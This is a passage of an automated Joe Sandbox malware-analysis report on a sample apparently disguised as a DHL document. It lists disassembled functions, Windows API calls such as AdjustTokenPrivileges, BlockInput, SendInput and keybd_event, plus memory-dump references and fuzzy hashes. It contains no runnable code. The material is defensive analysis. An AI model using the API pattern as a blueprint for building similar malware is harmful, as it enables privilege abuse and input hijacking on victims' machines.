                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                            • String ID:
                                                                                            • API String ID: 577356006-0
                                                                                            • Opcode ID: 79f2daea4feae865ede14ff0d389b950b97c21ad31fb807c620713033855e416
                                                                                            • Instruction ID: 82b63f33601866b765bb1bb1dc790f0e80af9565e4a2b3a2264ebf2c75dad450
                                                                                            • Opcode Fuzzy Hash: 79f2daea4feae865ede14ff0d389b950b97c21ad31fb807c620713033855e416
                                                                                            • Instruction Fuzzy Hash: 241191B2814309AFD718AF54DC8AD6AB7FDFF44754B20852EF05697245EB70BC428B60
                                                                                            Function 0088D5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0088D608
                                                                                            • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0088D645
                                                                                            • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0088D650
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseControlCreateDeviceFileHandle
                                                                                            • String ID:
                                                                                            • API String ID: 33631002-0
                                                                                            • Opcode ID: e83914654b265254230d33821e9d879611187cd295c9c3aa69fa97d2d571e0de
                                                                                            • Instruction ID: 17f960385ecdcdbc9de0b87141b23bb78ae0b6fe998822a87e2559f823c0ad5e
                                                                                            • Opcode Fuzzy Hash: e83914654b265254230d33821e9d879611187cd295c9c3aa69fa97d2d571e0de
                                                                                            • Instruction Fuzzy Hash: BC113C75E05228BBDB209F99AC45FAFBBBCFB45B50F108125F904E7290D6705A058BA1
                                                                                            Function 00881663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0088168C
                                                                                            • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 008816A1
                                                                                            • FreeSid.ADVAPI32(?), ref: 008816B1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                            • String ID:
                                                                                            • API String ID: 3429775523-0
                                                                                            • Opcode ID: d5a39dc7c034215818bd490d9cc8436dee6d37bb78d58c72b7fb5c80122a8b5d
                                                                                            • Instruction ID: 4862c481f041fafdfccfad57bfaae6b99af5e6cab8e22d8114e47940392665a2
                                                                                            • Opcode Fuzzy Hash: d5a39dc7c034215818bd490d9cc8436dee6d37bb78d58c72b7fb5c80122a8b5d
                                                                                            • Instruction Fuzzy Hash: CCF0F471950309FBDF00EFE49C89AAEBBBCFB08604F504565E501E2181E774AA458B60
                                                                                            Function 00844CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetCurrentProcess.KERNEL32(008528E9,?,00844CBE,008528E9,008E88B8,0000000C,00844E15,008528E9,00000002,00000000,?,008528E9), ref: 00844D09
                                                                                            • TerminateProcess.KERNEL32(00000000,?,00844CBE,008528E9,008E88B8,0000000C,00844E15,008528E9,00000002,00000000,?,008528E9), ref: 00844D10
                                                                                            • ExitProcess.KERNEL32 ref: 00844D22
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                            • String ID:
                                                                                            • API String ID: 1703294689-0
                                                                                            • Opcode ID: 6f848377bae4835d1f38fdb07eae0f3c0737fee0e968780550e56d9cfceefa04
                                                                                            • Instruction ID: 96a3b89e7aff149f69637cb5ae19bda256f5516ccf0ae8ab225dfe92c8c1d2f6
                                                                                            • Opcode Fuzzy Hash: 6f848377bae4835d1f38fdb07eae0f3c0737fee0e968780550e56d9cfceefa04
                                                                                            • Instruction Fuzzy Hash: 23E0B631400148ABCF11AF58DD09B583BA9FB45781B504118FC16DA222CB35DD42DA80
                                                                                            Function 0085C2A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: /
                                                                                            • API String ID: 0-2043925204
                                                                                            • Opcode ID: 717ed2102f6c94f1168b6f18fd0060ff5094855aab11909d7974312f717ece60
                                                                                            • Instruction ID: 4e8a1bb47a9476884f5be0df933881f3137c9d031520ca3d1412eccabb45cee4
                                                                                            • Opcode Fuzzy Hash: 717ed2102f6c94f1168b6f18fd0060ff5094855aab11909d7974312f717ece60
                                                                                            • Instruction Fuzzy Hash: 82411572900319AFCB209FB9CC89EAB77B9FB84356F5042A9FD05D7280E6709D858F50
                                                                                            Function 0087D27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetUserNameW.ADVAPI32(?,?), ref: 0087D28C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: NameUser
                                                                                            • String ID: X64
                                                                                            • API String ID: 2645101109-893830106
                                                                                            • Opcode ID: 530ef1d5707af4bc2f2557e65155a3f68ea779338d22c2be6fec52a7736b5d46
                                                                                            • Instruction ID: 8bc0f2c5ef05d18aedef09f854c8bbc88979a6f93606d9967a17eff7dedb23a5
                                                                                            • Opcode Fuzzy Hash: 530ef1d5707af4bc2f2557e65155a3f68ea779338d22c2be6fec52a7736b5d46
                                                                                            • Instruction Fuzzy Hash: 31D0C9B581121DEBCF94DB90EC88DDDB77CFB14309F104252F506E2000DB3095499F10
                                                                                            Function 0084CAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                                            • Instruction ID: 947fad7bcda00065bb690932772d9341e13090353a5f50920754c27451ad841c
                                                                                            • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                                            • Instruction Fuzzy Hash: 1F023C71E012199FDF54CFA9C8806ADFBF5FF88314F25816AD919EB380D731AA418B94
                                                                                            Function 008968EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00896918
                                                                                            • FindClose.KERNEL32(00000000), ref: 00896961
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Find$CloseFileFirst
                                                                                            • String ID:
                                                                                            • API String ID: 2295610775-0
                                                                                            • Opcode ID: d558397cecfd609c3dd17adbeb30e5d2758762ab03f57788bcb0d006c3ac8e09
                                                                                            • Instruction ID: bb0209799c86b9dcb6f3cff5c5ca628e222bd030f3a337bd9e3fd29e00ff6441
                                                                                            • Opcode Fuzzy Hash: d558397cecfd609c3dd17adbeb30e5d2758762ab03f57788bcb0d006c3ac8e09
                                                                                            • Instruction Fuzzy Hash: EE1193316042109FCB10DF29D484A16BBE5FF89328F18C699F469CF6A2DB30EC45CB91
                                                                                            Function 008937B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,008A4891,?,?,00000035,?), ref: 008937E4
                                                                                            • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,008A4891,?,?,00000035,?), ref: 008937F4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorFormatLastMessage
                                                                                            • String ID:
                                                                                            • API String ID: 3479602957-0
                                                                                            • Opcode ID: 475aef8fa37891a20a3ef209c1c13df271a6ac2c9dfa6e4b9bdc943b7a23c7dc
                                                                                            • Instruction ID: bda43ee956e6dd20d7b27355ba46fb888a216fd718ff549bbbbb7c6cc2666133
                                                                                            • Opcode Fuzzy Hash: 475aef8fa37891a20a3ef209c1c13df271a6ac2c9dfa6e4b9bdc943b7a23c7dc
                                                                                            • Instruction Fuzzy Hash: 29F0E5B06042283AEB2027AA9C4DFEB3BAEFFC4765F000275F509D2291D9609944C6B1
                                                                                            Function 0088B226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0088B25D
                                                                                            • keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 0088B270
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: InputSendkeybd_event
                                                                                            • String ID:
                                                                                            • API String ID: 3536248340-0
                                                                                            • Opcode ID: 9a2f6646be96e78d1b5ce49efc4518316edf6f0c00c5cf86e8e4183ef3d9d8f3
                                                                                            • Instruction ID: 09d485d918856fbdd54c028882df1a146eea770bdf3313791f53958e06e65024
                                                                                            • Opcode Fuzzy Hash: 9a2f6646be96e78d1b5ce49efc4518316edf6f0c00c5cf86e8e4183ef3d9d8f3
                                                                                            • Instruction Fuzzy Hash: 6FF01D7180424DABDB159FA4C805BEE7BB4FF04309F008119F955A6191C77996119F94
                                                                                            Function 008810BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,008811FC), ref: 008810D4
                                                                                            • CloseHandle.KERNEL32(?,?,008811FC), ref: 008810E9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: AdjustCloseHandlePrivilegesToken
                                                                                            • String ID:
                                                                                            • API String ID: 81990902-0
                                                                                            • Opcode ID: 052fd9cb7ae46bab63d0489b6b8ce1622ce61d36ec74f3738c949b4afb88abde
                                                                                            • Instruction ID: 3b1e798e161ffba9aefedd8b744006bc51f12db7b4ecd253eb37c33f70fd14a8
                                                                                            • Opcode Fuzzy Hash: 052fd9cb7ae46bab63d0489b6b8ce1622ce61d36ec74f3738c949b4afb88abde
                                                                                            • Instruction Fuzzy Hash: 17E04F32408600AFE7252B15FC09E7377E9FB04310F10892DF5A5C04B1DB626C90DB90
                                                                                            Function 0082CAF0 Relevance: 1.9, Strings: 1, Instructions: 659COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            • Variable is not of type 'Object'., xrefs: 00870C40
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: Variable is not of type 'Object'.
                                                                                            • API String ID: 0-1840281001
                                                                                            • Opcode ID: e572fcb974924933d604c90ff45d866d097cf006a73c04ac90d048ca9ab73744
                                                                                            • Instruction ID: a76ef60719fabd79f82abb9a35e67fb9fdcaf43ca33ab2b69d6df3a43dea4caf
                                                                                            • Opcode Fuzzy Hash: e572fcb974924933d604c90ff45d866d097cf006a73c04ac90d048ca9ab73744
                                                                                            • Instruction Fuzzy Hash: 13329E70900228DBCF14DF94E981AFDB7B5FF05308F548059E80AEB296DB75AE85CB61
                                                                                            Function 0085676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00856766,?,?,00000008,?,?,0085FEFE,00000000), ref: 00856998
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExceptionRaise
                                                                                            • String ID:
                                                                                            • API String ID: 3997070919-0
                                                                                            • Opcode ID: a6c69d2bd1ce8cada784dffdf945f6c183f0174e974ccbcd49c0807b086f28e4
                                                                                            • Instruction ID: 969cc35116df706dd5b830dd02163ad695f3f60e9fb1243a71e8a0c9eea8c377
                                                                                            • Opcode Fuzzy Hash: a6c69d2bd1ce8cada784dffdf945f6c183f0174e974ccbcd49c0807b086f28e4
                                                                                            • Instruction Fuzzy Hash: 84B17D31610608DFD715CF28C486B647BE0FF0536AF698658EC99CF2A2D335D9A9CB40
                                                                                            Function 0083B119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID: 0-3916222277
                                                                                            • Opcode ID: 702c57e116b37593e27156eb17eb90d6c945dff871dc7867fea97f74947a4197
                                                                                            • Instruction ID: f7df2a2c40b57e1a074a6e850f2713660b126416bb3f87777c3fef49e28d731f
                                                                                            • Opcode Fuzzy Hash: 702c57e116b37593e27156eb17eb90d6c945dff871dc7867fea97f74947a4197
                                                                                            • Instruction Fuzzy Hash: F5124EB1A00229DBCB14CF58C8816EEB7F5FF48710F14819AE949EB255EB349E81CB95
                                                                                            Function 0089EAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • BlockInput.USER32(00000001), ref: 0089EABD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: BlockInput
                                                                                            • String ID:
                                                                                            • API String ID: 3456056419-0
                                                                                            • Opcode ID: 53b45459a080f65e84f97c93d7b6866fbc605e552404e283c2400f4763914d06
                                                                                            • Instruction ID: c605d7c6e20937d5957756a16c3d837c386aa079a5b8c4a823fe63656f7c5cdf
                                                                                            • Opcode Fuzzy Hash: 53b45459a080f65e84f97c93d7b6866fbc605e552404e283c2400f4763914d06
                                                                                            • Instruction Fuzzy Hash: 9CE012312002149FD710EF59D404E5ABBD9FFA8760F048416FC45C7261DA70A8418B91
                                                                                            Function 008409D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,008403EE), ref: 008409DA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                            • String ID:
                                                                                            • API String ID: 3192549508-0
                                                                                            • Opcode ID: 7d17f19d7c7fd0006d3388b4122e2078a3175dd1348c0bb95df92b5a0295d9c7
                                                                                            • Instruction ID: f95133f4abdd9a41895b434edb67ccd86ca5f11854a4c495a2c3c205ee053717
                                                                                            • Opcode Fuzzy Hash: 7d17f19d7c7fd0006d3388b4122e2078a3175dd1348c0bb95df92b5a0295d9c7
                                                                                            • Instruction Fuzzy Hash:
                                                                                            Function 0084781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 0
                                                                                            • API String ID: 0-4108050209
                                                                                            • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                                            • Instruction ID: 95cb9d7062ade8681bc68663e75502b80089f5123516ad6cfbc0c1db0ac80d8b
                                                                                            • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                                            • Instruction Fuzzy Hash: 0551787160C74D9BDB38856C885E7BE6F89FB22344F180939D882D7282CB19DE05D35A
                                                                                            Function 00856DD9 Relevance: .6, Instructions: 637COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
